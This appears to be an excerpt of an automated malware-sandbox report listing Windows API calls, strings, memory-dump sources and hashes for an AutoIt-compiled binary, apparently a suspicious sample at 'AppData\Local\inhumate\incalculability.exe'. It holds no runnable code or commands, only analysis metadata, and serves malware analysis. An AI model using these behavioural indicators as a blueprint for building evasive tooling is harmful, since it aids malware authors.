                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                            Strings
                            Similarity
                            • API ID: ErrorMode$LabelVolume
                            • String ID: \VH
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetMenuItemInfoW.USER32 ref: 00449727
                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                            • DrawMenuBar.USER32 ref: 00449761
                            Strings
                            Similarity
                            • API ID: Menu$InfoItem$Draw_malloc
                            • String ID: 0
                            APIs
                            Strings
                            Similarity
                            • API ID: _wcslen$_wcscpy
                            • String ID: 3, 3, 8, 1
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpCloseHandle
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpCreateFile
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpSendEcho
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0047950F
                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                            • VariantClear.OLEAUT32(?), ref: 00479650
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            APIs
                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                            • __itow.LIBCMT ref: 004699CD
                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                            • __itow.LIBCMT ref: 00469A97
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                            • ScreenToClient.USER32(?,?), ref: 00449A80
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID:
                            APIs
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            APIs
                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                            • GetWindowRect.USER32(?,?), ref: 00441722
                            • PtInRect.USER32(?,?,?), ref: 00441734
                            • MessageBeep.USER32(00000000), ref: 004417AD
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID:
                            • API String ID: 1352109105-0
                            APIs
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                            • __isleadbyte_l.LIBCMT ref: 004208A6
                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            APIs
                            • GetParent.USER32(?), ref: 004503C8
                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                            Similarity
                            • API ID: Proc$Parent
                            • String ID:
                            • API String ID: 2351499541-0
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                            • TranslateMessage.USER32(?), ref: 00442B01
                            • DispatchMessageW.USER32(?), ref: 00442B0B
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                            Similarity
                            • API ID: Message$Peek$DispatchTranslate
                            • String ID:
                            • API String ID: 1795658109-0
                            APIs
                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                            • GetCaretPos.USER32(?), ref: 004743B2
                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                            • GetForegroundWindow.USER32 ref: 004743EE
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            APIs
                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                            • _wcslen.LIBCMT ref: 00449519
                            • _wcslen.LIBCMT ref: 00449526
                            Similarity
                            • API ID: MessageSend_wcslen$_wcspbrk
                            • String ID:
                            • API String ID: 2886238975-0
                            APIs
                            Similarity
                            • API ID: __setmode$DebugOutputString_fprintf
                            • String ID:
                            • API String ID: 1792727568-0
                            APIs
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                            Similarity
                            • API ID: Window$Long$AttributesLayered
                            • String ID:
                            • API String ID: 2169480361-0
                            APIs
                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                            Strings
                            Similarity
                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                            • String ID: cdecl
                            • API String ID: 3850814276-3896280584
                            APIs
                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                            • _memmove.LIBCMT ref: 0046D475
                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 2502553879-0
                            APIs
                            • SendMessageW.USER32 ref: 00448C69
                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                            Similarity
                            • API ID: MessageSend$LongWindow
                            • String ID:
                            • API String ID: 312131281-0
                            APIs
                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                            Similarity
                            • API ID: ErrorLastacceptselect
                            • String ID:
                            • API String ID: 385091864-0
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                            APIs
                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                            • GetStockObject.GDI32(00000011), ref: 00430258
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                            Similarity
                            • API ID: Window$CreateMessageObjectSendShowStock
                            • String ID:
                            • API String ID: 1358664141-0
                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                            • String ID:
                            • API String ID: 2880819207-0
                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            • String ID:
                            • API String ID: 357397906-0
                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                            APIs
                            • __wsplitpath.LIBCMT ref: 0043392E
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • __wsplitpath.LIBCMT ref: 00433950
                            • __wcsicoll.LIBCMT ref: 00433974
                            • __wcsicoll.LIBCMT ref: 0043398A
                            Similarity
                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                            • String ID:
                            • API String ID: 1187119602-0
                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                            APIs
                            Similarity
                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                            • String ID:
                            • API String ID: 1597257046-0
                            • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                            • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                            APIs
                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                            • __malloc_crt.LIBCMT ref: 0041F5B6
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                            Similarity
                            • API ID: EnvironmentStrings$Free__malloc_crt
                            • String ID:
                            • API String ID: 237123855-0
                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                            APIs
                            Similarity
                            • API ID: DeleteDestroyObject$IconWindow
                            • String ID:
                            • API String ID: 3349847261-0
                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                            Similarity
                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                            • String ID:
                            • API String ID: 2223660684-0
                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                            • LineTo.GDI32(?,?,?), ref: 00447326
                            • EndPath.GDI32(?), ref: 00447336
                            • StrokePath.GDI32(?), ref: 00447344
                            Similarity
                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                            • String ID:
                            • API String ID: 2783949968-0
                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                            APIs
                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                            Similarity
                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                            • String ID:
                            • API String ID: 2710830443-0
                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                            APIs
                            • GetDesktopWindow.USER32 ref: 00472B63
                            • GetDC.USER32(00000000), ref: 00472B6C
                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                            APIs
                            • GetDesktopWindow.USER32 ref: 00472BB2
                            • GetDC.USER32(00000000), ref: 00472BBB
                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                            APIs
                            • __getptd_noexit.LIBCMT ref: 00415150
                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                            • __freeptd.LIBCMT ref: 0041516B
                            • ExitThread.KERNEL32 ref: 00415173
                            Similarity
                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                            • String ID:
                            • API String ID: 1454798553-0
                            APIs
                            Strings
                            Similarity
                            • API ID: _strncmp
                            • String ID: Q\E
                            • API String ID: 909875538-2189900498
                            APIs
                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                            Strings
                            Similarity
                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 2652923123-3941886329
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove_strncmp
                            • String ID: U$\
                            • API String ID: 2666721431-100911408
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • __wcsnicmp.LIBCMT ref: 00467288
                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                            Strings
                            Similarity
                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                            • String ID: LPT
                            • API String ID: 3035604524-1350329615
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove
                            • String ID: \$h
                            • API String ID: 4104443479-677774858
                            APIs
                            Strings
                            Similarity
                            • API ID: _memcmp
                            • String ID: &
                            • API String ID: 2931989736-1010288
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove
                            • String ID: \
                            • API String ID: 4104443479-2967466578
                            APIs
                            • _wcslen.LIBCMT ref: 00466825
                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                            Strings
                            Similarity
                            • API ID: CrackInternet_wcslen
                            • String ID: |
                            • API String ID: 596671847-2343686810
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: '
                            • API String ID: 3850602802-1997036262
                            APIs
                            • _strlen.LIBCMT ref: 0040F858
                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                            • _sprintf.LIBCMT ref: 0040F9AE
                            Strings
                            Similarity
                            • API ID: _memmove$_sprintf_strlen
                            • String ID: %02X
                            • API String ID: 1921645428-436463671
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            APIs
                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                            Strings
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                            Strings
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            APIs
                            Strings
                            Similarity
                            • API ID: htonsinet_addr
                            • String ID: 255.255.255.255
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                            Strings
                            Similarity
                            • API ID: InternetOpen
                            • String ID: <local>
                            APIs
                            Strings
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove
                            • String ID: u,D
                            APIs
                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • wsprintfW.USER32 ref: 0045612A
                            Strings
                            Similarity
                            • API ID: MessageSend_mallocwsprintf
                            • String ID: %d/%02d/%02d
                            APIs
                            • InternetCloseHandle.WININET(?), ref: 00442663
                            • InternetCloseHandle.WININET ref: 00442668
                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                            Strings
                            Similarity
                            • API ID: CloseHandleInternet$ObjectSingleWait
                            • String ID: aeB
                            APIs
                            Strings
                            • ^B, xrefs: 00433248
                            • C:\Users\user\AppData\Local\inhumate\incalculability.exe, xrefs: 0043324B
                            Similarity
                            • API ID: _wcsncpy
                            • String ID: ^B$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                            • PostMessageW.USER32(00000000), ref: 00441C05
                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            Strings
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            Strings
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            APIs
                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                            Strings
                            Similarity
                            • API ID: Message_doexit
                            • String ID: AutoIt$Error allocating memory.